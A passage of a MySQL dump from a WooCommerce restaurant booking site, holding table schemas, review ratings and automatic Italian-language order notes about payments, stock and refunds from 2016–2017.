-- MySQL dump 10.13  Distrib 5.7.33, for Linux (x86_64)
--
-- Host: localhost    Database: baltazar_solymar
-- ------------------------------------------------------
-- Server version	5.7.33

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `wp_actionscheduler_actions`
--

DROP TABLE IF EXISTS `wp_actionscheduler_actions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_actionscheduler_actions` (
  `action_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `hook` varchar(191) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `status` varchar(20) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `scheduled_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `scheduled_date_local` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `args` varchar(191) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `schedule` longtext COLLATE utf8mb4_unicode_520_ci,
  `group_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `attempts` int(11) NOT NULL DEFAULT '0',
  `last_attempt_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `last_attempt_local` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `claim_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `extended_args` varchar(8000) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  PRIMARY KEY (`action_id`),
  KEY `hook` (`hook`),
  KEY `status` (`status`),
  KEY `scheduled_date_gmt` (`scheduled_date_gmt`),
  KEY `args` (`args`),
  KEY `group_id` (`group_id`),
  KEY `last_attempt_gmt` (`last_attempt_gmt`),
  KEY `claim_id` (`claim_id`)
) ENGINE=MyISAM AUTO_INCREMENT=1071 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_actionscheduler_actions`
--

LOCK TABLES `wp_actionscheduler_actions` WRITE;
/*!40000 ALTER TABLE `wp_actionscheduler_actions` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_actionscheduler_actions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_actionscheduler_claims`
--

DROP TABLE IF EXISTS `wp_actionscheduler_claims`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_actionscheduler_claims` (
  `claim_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `date_created_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`claim_id`),
  KEY `date_created_gmt` (`date_created_gmt`)
) ENGINE=MyISAM AUTO_INCREMENT=131745 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_actionscheduler_claims`
--

LOCK TABLES `wp_actionscheduler_claims` WRITE;
/*!40000 ALTER TABLE `wp_actionscheduler_claims` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_actionscheduler_claims` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_actionscheduler_groups`
--

DROP TABLE IF EXISTS `wp_actionscheduler_groups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_actionscheduler_groups` (
  `group_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `slug` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  PRIMARY KEY (`group_id`),
  KEY `slug` (`slug`(191))
) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_actionscheduler_groups`
--

LOCK TABLES `wp_actionscheduler_groups` WRITE;
/*!40000 ALTER TABLE `wp_actionscheduler_groups` DISABLE KEYS */;
INSERT INTO `wp_actionscheduler_groups` VALUES (1,'action-scheduler-migration'),(2,'woocommerce-db-updates'),(3,'wc_update_product_lookup_tables'),(4,'wc-admin-data');
/*!40000 ALTER TABLE `wp_actionscheduler_groups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_actionscheduler_logs`
--

DROP TABLE IF EXISTS `wp_actionscheduler_logs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_actionscheduler_logs` (
  `log_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `action_id` bigint(20) unsigned NOT NULL,
  `message` text COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `log_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `log_date_local` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`log_id`),
  KEY `action_id` (`action_id`),
  KEY `log_date_gmt` (`log_date_gmt`)
) ENGINE=MyISAM AUTO_INCREMENT=315 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_actionscheduler_logs`
--

LOCK TABLES `wp_actionscheduler_logs` WRITE;
/*!40000 ALTER TABLE `wp_actionscheduler_logs` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_actionscheduler_logs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_commentmeta`
--

DROP TABLE IF EXISTS `wp_commentmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_commentmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext,
  PRIMARY KEY (`meta_id`),
  KEY `comment_id` (`comment_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM AUTO_INCREMENT=981 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_commentmeta`
--

LOCK TABLES `wp_commentmeta` WRITE;
/*!40000 ALTER TABLE `wp_commentmeta` DISABLE KEYS */;
INSERT INTO `wp_commentmeta` VALUES (855,1200,'rating','4'),(856,1200,'verified','0'),(857,1201,'rating','3'),(858,1201,'verified','0'),(859,1202,'rating','4'),(860,1202,'verified','0'),(861,1203,'rating','5'),(862,1203,'verified','0'),(863,1204,'rating','3'),(864,1204,'verified','0'),(865,1205,'rating','5'),(866,1205,'verified','0'),(867,1206,'rating','4'),(868,1206,'verified','0'),(869,1207,'rating','4'),(870,1207,'verified','0'),(871,1208,'rating','5'),(872,1208,'verified','0'),(873,1209,'rating','4'),(874,1209,'verified','0'),(875,1210,'rating','5'),(876,1210,'verified','0'),(877,1211,'rating','2'),(878,1211,'verified','0'),(879,1212,'rating','4'),(880,1212,'verified','0'),(881,1213,'rating','5'),(882,1213,'verified','0'),(883,1214,'rating','1'),(884,1214,'verified','0'),(885,1230,'rating','3'),(886,1230,'verified','0'),(887,1231,'rating','4'),(888,1231,'verified','0'),(889,1232,'rating','5'),(890,1232,'verified','0'),(891,1233,'rating','5'),(892,1233,'verified','0'),(893,1234,'rating','4'),(894,1234,'verified','0'),(895,1235,'rating','5'),(896,1235,'verified','0'),(897,1236,'rating','4'),(898,1236,'verified','0'),(899,1237,'rating','4'),(900,1237,'verified','0'),(901,1238,'rating','3'),(902,1238,'verified','0'),(903,1239,'rating','5'),(904,1239,'verified','0'),(905,1240,'rating','5'),(906,1240,'verified','0'),(907,1241,'rating','5'),(908,1241,'verified','0'),(909,1242,'rating','3'),(910,1242,'verified','0'),(911,1243,'rating','4'),(912,1243,'verified','0');
/*!40000 ALTER TABLE `wp_commentmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_comments`
--

DROP TABLE IF EXISTS `wp_comments`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_comments` (
  `comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT '0',
  `comment_author` tinytext NOT NULL,
  `comment_author_email` varchar(100) NOT NULL DEFAULT '',
  `comment_author_url` varchar(200) NOT NULL DEFAULT '',
  `comment_author_IP` varchar(100) NOT NULL DEFAULT '',
  `comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_content` text NOT NULL,
  `comment_karma` int(11) NOT NULL DEFAULT '0',
  `comment_approved` varchar(20) NOT NULL DEFAULT '1',
  `comment_agent` varchar(255) NOT NULL DEFAULT '',
  `comment_type` varchar(20) NOT NULL DEFAULT 'comment',
  `comment_parent` bigint(20) unsigned NOT NULL DEFAULT '0',
  `user_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`comment_ID`),
  KEY `comment_post_ID` (`comment_post_ID`),
  KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
  KEY `comment_date_gmt` (`comment_date_gmt`),
  KEY `comment_parent` (`comment_parent`),
  KEY `comment_author_email` (`comment_author_email`(10)),
  KEY `woo_idx_comment_type` (`comment_type`)
) ENGINE=MyISAM AUTO_INCREMENT=1293 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_comments`
--

LOCK TABLES `wp_comments` WRITE;
/*!40000 ALTER TABLE `wp_comments` DISABLE KEYS */;
INSERT INTO `wp_comments` VALUES (7,229,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-11-29 09:51:17','2016-11-29 08:51:17','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(8,229,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-11-29 09:51:17','2016-11-29 08:51:17','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(9,229,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-11-29 09:51:20','2016-11-29 08:51:20','Magazzino dell\'elemento tavolox2 ridotto da 8 a 7.',0,'1','WooCommerce','order_note',0,0),(10,230,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-11-30 08:40:34','2016-11-30 07:40:34','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(11,230,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-11-30 08:40:34','2016-11-30 07:40:34','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(12,230,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-11-30 08:40:35','2016-11-30 07:40:35','Magazzino dell\'elemento tavolox2 ridotto da 7 a 6.',0,'1','WooCommerce','order_note',0,0),(13,231,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-11-30 12:41:31','2016-11-30 11:41:31','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(14,232,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-11-30 13:33:29','2016-11-30 12:33:29','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(15,232,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-11-30 13:33:29','2016-11-30 12:33:29','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(16,232,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-11-30 13:33:31','2016-11-30 12:33:31','Magazzino dell\'elemento tavolox2 ridotto da 6 a 5.',0,'1','WooCommerce','order_note',0,0),(17,233,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-03 12:26:56','2016-12-03 11:26:56','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(18,233,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-03 12:26:56','2016-12-03 11:26:56','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(19,233,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-03 12:26:58','2016-12-03 11:26:58','Magazzino dell\'elemento tavolox6 ridotto da 2 a 1.',0,'1','WooCommerce','order_note',0,0),(20,235,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-04 03:50:30','2016-12-04 02:50:30','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(21,240,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-04 18:29:05','2016-12-04 17:29:05','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(22,240,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-04 18:29:05','2016-12-04 17:29:05','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(23,240,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-04 18:29:06','2016-12-04 17:29:06','Magazzino dell\'elemento tavolox2 ridotto da 5 a 4.',0,'1','WooCommerce','order_note',0,0),(24,239,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-04 18:29:49','2016-12-04 17:29:49','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(25,239,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-04 18:29:49','2016-12-04 17:29:49','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(26,239,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-04 18:29:51','2016-12-04 17:29:51','Magazzino dell\'elemento tavolox2 ridotto da 4 a 2.',0,'1','WooCommerce','order_note',0,0),(27,241,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-06 18:16:19','2016-12-06 17:16:19','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(28,241,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-06 18:16:19','2016-12-06 17:16:19','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(29,241,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-06 18:16:28','2016-12-06 17:16:28','Magazzino dell\'elemento tavolox2 ridotto da 2 a 1.',0,'1','WooCommerce','order_note',0,0),(30,242,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-07 20:14:24','2016-12-07 19:14:24','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(31,242,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-07 20:14:24','2016-12-07 19:14:24','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(32,242,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-07 20:14:26','2016-12-07 19:14:26','Magazzino dell\'elemento tavolox6 ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(33,243,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-07 22:16:43','2016-12-07 21:16:43','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(34,243,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-07 22:16:43','2016-12-07 21:16:43','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(35,243,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-07 22:16:45','2016-12-07 21:16:45','Magazzino dell\'elemento 216 ridotto da 5 a 4.',0,'1','WooCommerce','order_note',0,0),(36,243,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-07 22:16:45','2016-12-07 21:16:45','Magazzino dell\'elemento tavolox2 ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(37,246,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-10 14:59:00','2016-12-10 13:59:00','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(38,246,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-10 14:59:00','2016-12-10 13:59:00','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(39,246,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-10 14:59:01','2016-12-10 13:59:01','Magazzino dell\'elemento tavolox2 ridotto da 2 a 1.',0,'1','WooCommerce','order_note',0,0),(40,248,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-14 12:25:21','2016-12-14 11:25:21','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(41,248,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-14 12:25:21','2016-12-14 11:25:21','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(42,248,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-14 12:25:23','2016-12-14 11:25:23','Magazzino dell\'elemento tavolox4 ridotto da 3 a 2.',0,'1','WooCommerce','order_note',0,0),(43,250,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-15 15:58:33','2016-12-15 14:58:33','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(44,250,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-15 15:58:33','2016-12-15 14:58:33','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(45,250,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-15 15:58:35','2016-12-15 14:58:35','Magazzino dell\'elemento tavolox6 ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(46,252,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-16 10:32:13','2016-12-16 09:32:13','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(47,252,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-16 10:32:13','2016-12-16 09:32:13','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(48,252,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-16 10:32:15','2016-12-16 09:32:15','Magazzino dell\'elemento tavolox3 ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(49,253,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-16 13:22:28','2016-12-16 12:22:28','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(50,253,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-16 13:22:28','2016-12-16 12:22:28','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(51,253,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-16 13:22:30','2016-12-16 12:22:30','Magazzino dell\'elemento tavolox2 ridotto da 2 a 1.',0,'1','WooCommerce','order_note',0,0),(52,254,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-17 00:15:25','2016-12-16 23:15:25','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(53,254,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-17 00:15:25','2016-12-16 23:15:25','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(54,254,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-17 00:15:27','2016-12-16 23:15:27','Magazzino dell\'elemento tavolox4 ridotto da 2 a 1.',0,'1','WooCommerce','order_note',0,0),(55,255,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-17 21:13:16','2016-12-17 20:13:16','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(56,255,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-17 21:13:16','2016-12-17 20:13:16','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(57,255,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-17 21:13:18','2016-12-17 20:13:18','Magazzino dell\'elemento tavolox2 ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(58,256,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-20 14:17:20','2016-12-20 13:17:20','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(59,257,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-21 12:52:37','2016-12-21 11:52:37','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(60,257,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-21 12:52:37','2016-12-21 11:52:37','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(61,257,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-21 12:52:39','2016-12-21 11:52:39','Magazzino dell\'elemento tavolox5 ridotto da 2 a 1.',0,'1','WooCommerce','order_note',0,0),(62,258,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-21 21:50:56','2016-12-21 20:50:56','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(63,259,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-21 22:38:27','2016-12-21 21:38:27','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(64,259,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-21 22:38:27','2016-12-21 21:38:27','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(65,259,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-21 22:38:29','2016-12-21 21:38:29','Magazzino dell\'elemento tavolox2 ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(66,261,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-23 13:28:17','2016-12-23 12:28:17','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(67,261,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-23 13:28:17','2016-12-23 12:28:17','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(68,261,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-23 13:28:18','2016-12-23 12:28:18','Magazzino dell\'elemento tavolox4 ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(69,265,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-30 13:24:07','2016-12-30 12:24:07','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(70,265,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-30 13:24:07','2016-12-30 12:24:07','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(71,265,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-30 13:24:09','2016-12-30 12:24:09','Magazzino dell\'elemento tavolox5 ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(72,266,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-30 15:55:47','2016-12-30 14:55:47','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(73,266,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-30 15:55:47','2016-12-30 14:55:47','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(74,266,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-30 15:55:49','2016-12-30 14:55:49','Magazzino dell\'elemento tavolox4 ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(75,248,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-31 12:03:57','2016-12-31 11:03:57','Pagamento refunded tramite IPN. Lo stato dell\'ordine è cambiato da In lavorazione a Rimborsato.',0,'1','WooCommerce','order_note',0,0),(76,233,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2016-12-31 12:08:01','2016-12-31 11:08:01','Pagamento refunded tramite IPN. Lo stato dell\'ordine è cambiato da In lavorazione a Rimborsato.',0,'1','WooCommerce','order_note',0,0),(77,230,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-01-01 10:42:20','2017-01-01 09:42:20','Pagamento refunded tramite IPN. Lo stato dell\'ordine è cambiato da In lavorazione a Rimborsato.',0,'1','WooCommerce','order_note',0,0),(80,291,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-03 18:15:16','2017-02-03 17:15:16','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(81,291,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-03 18:15:16','2017-02-03 17:15:16','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(82,291,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-03 18:15:19','2017-02-03 17:15:19','Magazzino dell\'elemento 288 ridotto da 18 a 17.',0,'1','WooCommerce','order_note',0,0),(86,295,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-09 03:49:27','2017-02-09 02:49:27','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(87,297,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-09 15:26:41','2017-02-09 14:26:41','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(88,297,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-09 15:26:41','2017-02-09 14:26:41','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(89,297,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-09 15:26:43','2017-02-09 14:26:43','Magazzino dell\'elemento 288 ridotto da 17 a 16.',0,'1','WooCommerce','order_note',0,0),(90,296,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-09 15:38:20','2017-02-09 14:38:20','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(91,298,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-09 18:00:40','2017-02-09 17:00:40','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(92,298,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-09 18:00:40','2017-02-09 17:00:40','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(93,298,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-09 18:00:41','2017-02-09 17:00:41','Magazzino dell\'elemento 288 ridotto da 16 a 15.',0,'1','WooCommerce','order_note',0,0),(94,299,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-09 19:19:10','2017-02-09 18:19:10','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(95,299,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-09 19:19:10','2017-02-09 18:19:10','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(96,299,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-09 19:19:12','2017-02-09 18:19:12','Magazzino dell\'elemento 288 ridotto da 15 a 14.',0,'1','WooCommerce','order_note',0,0),(97,302,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-09 20:45:46','2017-02-09 19:45:46','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(98,304,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-10 14:35:22','2017-02-10 13:35:22','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(99,304,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-02-10 14:35:22','2017-02-10 13:35:22','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In 